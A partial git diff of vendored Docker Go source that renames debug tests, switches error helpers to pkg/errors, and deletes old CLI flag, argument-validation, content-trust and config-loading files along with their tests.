a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/cli/debug/debug_test.go similarity index 71% rename from vendor/github.com/docker/docker/utils/debug_test.go rename to vendor/github.com/docker/docker/cli/debug/debug_test.go index 6f9c4dfbb0..5b6d788a39 100644 --- a/vendor/github.com/docker/docker/utils/debug_test.go +++ b/vendor/github.com/docker/docker/cli/debug/debug_test.go @@ -1,18 +1,18 @@ -package utils +package debug // import "github.com/docker/docker/cli/debug" import ( "os" "testing" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) -func TestEnableDebug(t *testing.T) { +func TestEnable(t *testing.T) { defer func() { os.Setenv("DEBUG", "") logrus.SetLevel(logrus.InfoLevel) }() - EnableDebug() + Enable() if os.Getenv("DEBUG") != "1" { t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG")) } @@ -21,8 +21,8 @@ func TestEnableDebug(t *testing.T) { } } -func TestDisableDebug(t *testing.T) { - DisableDebug() +func TestDisable(t *testing.T) { + Disable() if os.Getenv("DEBUG") != "" { t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG")) } @@ -31,13 +31,13 @@ func TestDisableDebug(t *testing.T) { } } -func TestDebugEnabled(t *testing.T) { - EnableDebug() - if !IsDebugEnabled() { +func TestEnabled(t *testing.T) { + Enable() + if !IsEnabled() { t.Fatal("expected debug enabled, got false") } - DisableDebug() - if IsDebugEnabled() { + Disable() + if IsEnabled() { t.Fatal("expected debug disabled, got true") } } diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go index 62f62433b8..ea7c0eb506 100644 --- a/vendor/github.com/docker/docker/cli/error.go +++ b/vendor/github.com/docker/docker/cli/error.go @@ -1,4 +1,4 @@ -package cli +package cli // import "github.com/docker/docker/cli" import ( "fmt" diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go deleted file mode 100644 index 9b6940f6bd..0000000000 --- a/vendor/github.com/docker/docker/cli/flags/client.go +++ /dev/null @@ -1,13 +0,0 @@ -package flags - -// ClientOptions are the options used to configure the client cli -type ClientOptions struct { - Common *CommonOptions - ConfigDir string - Version bool -} - -// NewClientOptions returns a new ClientOptions -func NewClientOptions() *ClientOptions { - return &ClientOptions{Common: NewCommonOptions()} -} diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go deleted file mode 100644 index 81eaa38f43..0000000000 --- a/vendor/github.com/docker/docker/cli/flags/common_test.go +++ /dev/null @@ -1,42 +0,0 @@ -package flags - -import ( - "path/filepath" - "testing" - - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/pflag" -) - -func TestCommonOptionsInstallFlags(t *testing.T) { - flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) - opts := NewCommonOptions() - opts.InstallFlags(flags) - - err := flags.Parse([]string{ - "--tlscacert=\"/foo/cafile\"", - "--tlscert=\"/foo/cert\"", - "--tlskey=\"/foo/key\"", - }) - assert.NilError(t, err) - assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile") - assert.Equal(t, opts.TLSOptions.CertFile, "/foo/cert") - assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key") -} - -func defaultPath(filename string) string { - return filepath.Join(cliconfig.ConfigDir(), filename) -} - -func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { - flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) - opts := NewCommonOptions() - opts.InstallFlags(flags) - - err := flags.Parse([]string{}) - assert.NilError(t, err) - assert.Equal(t, opts.TLSOptions.CAFile, defaultPath("ca.pem")) - assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem")) - assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem")) -} diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go index 8ee02c8429..e1ff02d2e9 100644 --- a/vendor/github.com/docker/docker/cli/required.go +++ b/vendor/github.com/docker/docker/cli/required.go @@ -1,9 +1,9 @@ -package cli +package cli // import "github.com/docker/docker/cli" import ( - "fmt" "strings" + "github.com/pkg/errors" "github.com/spf13/cobra" ) @@ -14,10 +14,10 @@ func NoArgs(cmd *cobra.Command, args []string) error { } if cmd.HasSubCommands() { - return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) + return errors.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) } - return fmt.Errorf( + return errors.Errorf( "\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", cmd.CommandPath(), cmd.CommandPath(), @@ -25,72 +25,3 @@ func NoArgs(cmd *cobra.Command, args []string) error { cmd.Short, ) } - -// RequiresMinArgs returns an error if there is not at least min args -func RequiresMinArgs(min int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) >= min { - return nil - } - return fmt.Errorf( - "\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - min, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// RequiresMaxArgs returns an error if there is not at most max args -func RequiresMaxArgs(max int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) <= max { - return nil - } - return fmt.Errorf( - "\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - max, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// RequiresRangeArgs returns an error if there is not at least min args and at most max args -func RequiresRangeArgs(min int, max int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) >= min && len(args) <= max { - return nil - } - return fmt.Errorf( - "\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - min, - max, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// ExactArgs returns an error if there is not the exact number of args -func ExactArgs(number int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) == number { - return nil - } - return fmt.Errorf( - "\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - number, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go deleted file mode 100644 index 51914f74b0..0000000000 --- a/vendor/github.com/docker/docker/cli/trust/trust.go +++ /dev/null @@ -1,232 +0,0 @@ -package trust - -import ( - "encoding/json" - "fmt" - "net" - "net/http" - "net/url" - "os" - "path" - "path/filepath" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/registry/client/auth" - "github.com/docker/distribution/registry/client/auth/challenge" - "github.com/docker/distribution/registry/client/transport" - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/registry" - "github.com/docker/go-connections/tlsconfig" - "github.com/docker/notary" - "github.com/docker/notary/client" - "github.com/docker/notary/passphrase" - "github.com/docker/notary/storage" - "github.com/docker/notary/trustmanager" - "github.com/docker/notary/trustpinning" - "github.com/docker/notary/tuf/data" - "github.com/docker/notary/tuf/signed" -) - -var ( - // ReleasesRole is the role named "releases" - ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases") -) - -func trustDirectory() string { - return filepath.Join(cliconfig.ConfigDir(), "trust") -} - -// certificateDirectory returns the directory containing -// TLS certificates for the given server. An error is -// returned if there was an error parsing the server string. -func certificateDirectory(server string) (string, error) { - u, err := url.Parse(server) - if err != nil { - return "", err - } - - return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil -} - -// Server returns the base URL for the trust server. -func Server(index *registrytypes.IndexInfo) (string, error) { - if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" { - urlObj, err := url.Parse(s) - if err != nil || urlObj.Scheme != "https" { - return "", fmt.Errorf("valid https URL required for trust server, got %s", s) - } - - return s, nil - } - if index.Official { - return registry.NotaryServer, nil - } - return "https://" + index.Name, nil -} - -type simpleCredentialStore struct { - auth types.AuthConfig -} - -func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) { - return scs.auth.Username, scs.auth.Password -} - -func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string { - return scs.auth.IdentityToken -} - -func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) { -} - -// GetNotaryRepository returns a NotaryRepository which stores all the -// information needed to operate on a notary repository. -// It creates an HTTP transport providing authentication support. -func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) { - server, err := Server(repoInfo.Index) - if err != nil { - return nil, err - } - - var cfg = tlsconfig.ClientDefault() - cfg.InsecureSkipVerify = !repoInfo.Index.Secure - - // Get certificate base directory - certDir, err := certificateDirectory(server) - if err != nil { - return nil, err - } - logrus.Debugf("reading certificate directory: %s", certDir) - - if err := registry.ReadCertsDirectory(cfg, certDir); err != nil { - return nil, err - } - - base := &http.Transport{ - Proxy: http.ProxyFromEnvironment, - Dial: (&net.Dialer{ - Timeout: 30 * time.Second, - KeepAlive: 30 * time.Second, - DualStack: true, - }).Dial, - TLSHandshakeTimeout: 10 * time.Second, - TLSClientConfig: cfg, - DisableKeepAlives: true, - } - - // Skip configuration headers since request is not going to Docker daemon - modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{}) - authTransport := transport.NewTransport(base, modifiers...) - pingClient := &http.Client{ - Transport: authTransport, - Timeout: 5 * time.Second, - } - endpointStr := server + "/v2/" - req, err := http.NewRequest("GET", endpointStr, nil) - if err != nil { - return nil, err - } - - challengeManager := challenge.NewSimpleManager() - - resp, err := pingClient.Do(req) - if err != nil { - // Ignore error on ping to operate in offline mode - logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err) - } else { - defer resp.Body.Close() - - // Add response to the challenge manager to parse out - // authentication header and register authentication method - if err := challengeManager.AddResponse(resp); err != nil { - return nil, err - } - } - - scope := auth.RepositoryScope{ - Repository: repoInfo.FullName(), - Actions: actions, - Class: repoInfo.Class, - } - creds := simpleCredentialStore{auth: authConfig} - tokenHandlerOptions := auth.TokenHandlerOptions{ - Transport: authTransport, - Credentials: creds, - Scopes: []auth.Scope{scope}, - ClientID: registry.AuthClientID, - } - tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) - basicHandler := auth.NewBasicHandler(creds) - modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))) - tr := transport.NewTransport(base, modifiers...) - - return client.NewNotaryRepository( - trustDirectory(), - repoInfo.FullName(), - server, - tr, - getPassphraseRetriever(streams), - trustpinning.TrustPinConfig{}) -} - -func getPassphraseRetriever(streams command.Streams) notary.PassRetriever { - aliasMap := map[string]string{ - "root": "root", - "snapshot": "repository", - "targets": "repository", - "default": "repository", - } - baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap) - env := map[string]string{ - "root": os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"), - "snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - "targets": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - "default": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - } - - return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) { - if v := env[alias]; v != "" { - return v, numAttempts > 1, nil - } - // For non-root roles, we can also try the "default" alias if it is specified - if v := env["default"]; v != "" && alias != data.CanonicalRootRole { - return v, numAttempts > 1, nil - } - return baseRetriever(keyName, alias, createNew, numAttempts) - } -} - -// NotaryError formats an error message received from the notary service -func NotaryError(repoName string, err error) error { - switch err.(type) { - case *json.SyntaxError: - logrus.Debugf("Notary syntax error: %s", err) - return fmt.Errorf("Error: no trust data available for remote repository %s. Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName) - case signed.ErrExpired: - return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err) - case trustmanager.ErrKeyNotFound: - return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err) - case storage.NetworkError: - return fmt.Errorf("Error: error contacting notary server: %v", err) - case storage.ErrMetaNotFound: - return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err) - case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType: - return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err) - case signed.ErrNoKeys: - return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err) - case signed.ErrLowVersion: - return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err) - case signed.ErrRoleThreshold: - return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err) - case client.ErrRepositoryNotExist: - return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err) - case signed.ErrInsufficientSignatures: - return fmt.Errorf("Error: could not produce valid signature for %s. If Yubikey was used, was touch input provided?: %v", repoName, err) - } - - return err -} diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go deleted file mode 100644 index d81bf86b7a..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/config.go +++ /dev/null @@ -1,120 +0,0 @@ -package cliconfig - -import ( - "fmt" - "io" - "os" - "path/filepath" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/pkg/homedir" -) - -const ( - // ConfigFileName is the name of config file - ConfigFileName = "config.json" - configFileDir = ".docker" - oldConfigfile = ".dockercfg" -) - -var ( - configDir = os.Getenv("DOCKER_CONFIG") -) - -func init() { - if configDir == "" { - configDir = filepath.Join(homedir.Get(), configFileDir) - } -} - -// ConfigDir returns the directory the configuration file is stored in -func ConfigDir() string { - return configDir -} - -// SetConfigDir sets the directory the configuration file is stored in -func SetConfigDir(dir string) { - configDir = dir -} - -// NewConfigFile initializes an empty configuration file for the given filename 'fn' -func NewConfigFile(fn string) *configfile.ConfigFile { - return &configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - HTTPHeaders: make(map[string]string), - Filename: fn, - } -} - -// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from -// a non-nested reader -func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { - configFile := configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - } - err := configFile.LegacyLoadFromReader(configData) - return &configFile, err -} - -// LoadFromReader is a convenience function that creates a ConfigFile object from -// a reader -func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { - configFile := configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - } - err := configFile.LoadFromReader(configData) - return &configFile, err -} - -// Load reads the configuration files in the given directory, and sets up -// the auth config information and returns values. -// FIXME: use the internal golang config parser -func Load(configDir string) (*configfile.ConfigFile, error) { - if configDir == "" { - configDir = ConfigDir() - } - - configFile := configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - Filename: filepath.Join(configDir, ConfigFileName), - } - - // Try happy path first - latest config file - if _, err := os.Stat(configFile.Filename); err == nil { - file, err := os.Open(configFile.Filename) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) - } - defer file.Close() - err = configFile.LoadFromReader(file) - if err != nil { - err = fmt.Errorf("%s - %v", configFile.Filename, err) - } - return &configFile, err - } else if !os.IsNotExist(err) { - // if file is there but we can't stat it for any reason other - // than it doesn't exist then stop - return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) - } - - // Can't find latest config file so check for the old one - confFile := filepath.Join(homedir.Get(), oldConfigfile) - if _, err := os.Stat(confFile); err != nil { - return &configFile, nil //missing file is not an error - } - file, err := os.Open(confFile) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", confFile, err) - } - defer file.Close() - err = configFile.LegacyLoadFromReader(file) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", confFile, err) - } - - if configFile.HTTPHeaders == nil { - configFile.HTTPHeaders = map[string]string{} - } - return &configFile, nil -} diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go deleted file mode 100644 index d8a099ab58..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/config_test.go +++ /dev/null @@ -1,621 +0,0 @@ -package cliconfig - -import ( - "io/ioutil" - "os" - "path/filepath" - "strings" - "testing" - - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/pkg/homedir" -) - -func TestEmptyConfigDir(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - SetConfigDir(tmpHome) - - config, err := Load("") - if err != nil { - t.Fatalf("Failed loading on empty config dir: %q", err) - } - - expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName) - if config.Filename != expectedConfigFilename { - t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestMissingFile(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on missing file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestSaveFileToDirs(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - tmpHome += "/.docker" - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on missing file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestEmptyFile(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil { - t.Fatal(err) - } - - _, err = Load(tmpHome) - if err == nil { - t.Fatalf("Was supposed to fail") - } -} - -func TestEmptyJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestOldInvalidsAuth(t *testing.T) { - invalids := map[string]string{ - `username = test`: "The Auth config file is empty", - `username -password`: "Invalid Auth config file", - `username = test -email`: "Invalid auth configuration file", - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - for content, expectedError := range invalids { - fn := filepath.Join(tmpHome, oldConfigfile) - if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - // Use Contains instead of == since the file name will change each time - if err == nil || !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError) - } - - } -} - -func TestOldValidAuth(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `username = am9lam9lOmhlbGxv - email = user@example.com` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatal(err) - } - - // defaultIndexserver is https://index.docker.io/v1/ - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestOldJSONInvalid(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - // Use Contains instead of == since the file name will change each time - if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") { - t.Fatalf("Expected an error got : %v, %v", config, err) - } -} - -func TestOldJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv", - "email": "user@example.com" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr) - } -} - -func TestNewJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestNewJSONNoEmail(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestJSONWithPsFormat(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { - t.Fatalf("Unknown ps format: %s\n", config.PsFormat) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"psFormat":`) || - !strings.Contains(configStr, "{{.ID}}") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -func TestJSONWithCredentialStore(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "credsStore": "crazy-secure-storage" -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.CredentialsStore != "crazy-secure-storage" { - t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"credsStore":`) || - !strings.Contains(configStr, "crazy-secure-storage") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -func TestJSONWithCredentialHelpers(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" } -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.CredentialHelpers == nil { - t.Fatal("config.CredentialHelpers was nil") - } else if config.CredentialHelpers["images.io"] != "images-io" || - config.CredentialHelpers["containers.com"] != "crazy-secure-storage" { - t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"credHelpers":`) || - !strings.Contains(configStr, "images.io") || - !strings.Contains(configStr, "images-io") || - !strings.Contains(configStr, "containers.com") || - !strings.Contains(configStr, "crazy-secure-storage") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -// Save it and make sure it shows up in new form -func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string { - if err := config.Save(); err != nil { - t.Fatalf("Failed to save: %q", err) - } - - buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - if !strings.Contains(string(buf), `"auths":`) { - t.Fatalf("Should have save in new form: %s", string(buf)) - } - return string(buf) -} - -func TestConfigDir(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - if ConfigDir() == tmpHome { - t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome) - } - - // Update configDir - SetConfigDir(tmpHome) - - if ConfigDir() != tmpHome { - t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir()) - } -} - -func TestConfigFile(t *testing.T) { - configFilename := "configFilename" - configFile := NewConfigFile(configFilename) - - if configFile.Filename != configFilename { - t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename) - } -} - -func TestJSONReaderNoFile(t *testing.T) { - js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }` - - config, err := LoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if 